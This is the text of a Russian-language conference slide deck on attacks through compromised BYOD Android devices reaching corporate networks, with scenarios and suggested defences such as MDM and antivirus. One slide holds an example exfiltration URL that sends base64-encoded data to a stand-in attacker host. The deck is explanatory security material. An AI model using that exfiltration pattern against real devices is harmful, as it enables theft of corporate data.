26

Варианты реализации атак через мобильные устройства

Embed Size (px)

Citation preview

Развитие атак на мобильных устройствах

Артем Чайкин

Обо мне

- Руководитель отдела безопасности мобильных приложений - SCADA Strangelove

Вводные

― BYOD ― Android (rooted / non-rooted) ― Установлено вредоносное ПО ― Устройство подключено к корпоративной сети

Сценарий I

Сценарий I

― Всё плохо ― Логин-пароль хранятся в открытом тексте

Сценарий I – Что делать?

Сценарий II

Сценарий II

Сценарий II

Сценарий II

Сценарий II

Сценарий II

Сценарий II

Сценарий II

http://attacker.com/?data=base64_encoded_data

Сценарий II

Сценарий II

Сценарий II – Что делать?

― MDM. Установка приложений из официального магазина ― Антивирусы. Поведенческий анализ ― Прецедентов не зарегистрировано. Пока

Сценарий II

Сценарий II

Развитие атаки на сеть

Развитие атаки на сеть

Развитие атаки на сеть

Развитие атаки на сеть

Конец рассказа Спасибо за внимание

Артем Чайкин